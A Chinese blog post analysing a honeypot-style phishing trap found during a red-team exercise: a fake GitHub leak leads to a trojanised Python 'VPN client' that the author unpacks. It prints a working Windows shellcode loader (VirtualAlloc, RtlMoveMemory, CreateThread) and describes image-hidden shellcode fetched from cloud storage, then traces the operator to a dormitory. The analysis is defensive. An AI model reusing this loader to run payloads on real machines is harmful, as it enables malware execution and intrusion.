美文网首页
【攻防演练】Github信息泄漏的分析溯源过程

【攻防演练】Github信息泄漏的分析溯源过程

作者: H_00c8 | 来源:发表于2022-04-30 14:07 被阅读0次

在某次攻防演练信息收集的过程中,偶然发现伪装Github信息泄漏进而钓鱼红队人员的后门。

下面展开有趣的分析溯源过程。

信息收集

GIthub信息泄漏

根据<typo id="typo-85" data-origin="甲方" ignoretag="true">甲方</typo>信息进行

常规的Github敏感信息收集偶然发现一个仓库不简单

image.png

这不是mysql账号密码泄漏了吗,愉快的打开Navicat

image.png

失败....于是访问源码的8080端口查看一番,发现一个管理后台

image.png

弱口令

针对后台尝试一波弱口令,admin/admin 嗯~进来了

image.png

进来之后竟然发现账号密码而且客户端解压密码都贴心<typo id="typo-250" data-origin="的" ignoretag="true">的</typo>放了出来

image.png

到这里我竟然没有察觉到任何异常,以为能够拿到VPN入口权限;抓紧下载VPN客户端。

解压出来这个样子,emmm。。还没发现异常

image.png

分析溯源

还好有谨慎的习惯,放入虚拟机瞅瞅。

哦豁,竟然提示不兼容当前系统;看到弹窗有Pyhton代码编写的特征。感觉到前面的打点由过于丝滑,不自然<typo id="typo-401" data-origin="的" ignoretag="true">的</typo>警觉了起来。

包括前面弱口令的提交方式竟然为admin.php?user=admin&passwd=admin

image.png

由于发现VPN客户端为python语言编写,更不对劲了,反编译看下。

【相关技术文档】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记

解包

python3 pyinstxtractor.py vpnclient64.exe
image.png

生成一个以 exe文件名+_extracted 的文件夹,这个就是解包后的数据

image.png image.png

PyInstaller打包后,pyc文件的前8个字节会被抹掉,所以最后要自己添加回去。

添加头

根据struct.py文件

image.png image.png

源码
得到py文件,easyvpn64.py为后门主程序,其中执行shellcode代码隐藏至图片中。

image.png

通过requests请求OSS存储中的图片,图片内容为shellcode加载器。

image.png

shellcodeLoader部分

image.png 
import base64
import ctypes

str = b''
sc_base64 = (base64.a85decode(str)).decode('utf-8')
shellcode = bytearray(bytearray.fromhex((base64.b64decode(sc_base64)).decode('utf-8')))

ptr = ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))

handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0),
                                             ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

知道shellcodeloader加载方式就好办了,提取CS回连地址。

image.png

溯源

回连地址:Host: cs.xxx.cn

nslookup解析地址

image.png

根据IP地址定位在某宿舍

image.png

直接溯源到人,tg结合一波。

image.png

总结

在攻防演练过程中一定要小心,防止被钓鱼。

相关文章

网友评论

      本文标题:【攻防演练】Github信息泄漏的分析溯源过程

      本文链接:https://www.haomeiwen.com/subject/zfryyrtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|【攻防演练】Github信息泄漏的分析溯源过程|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!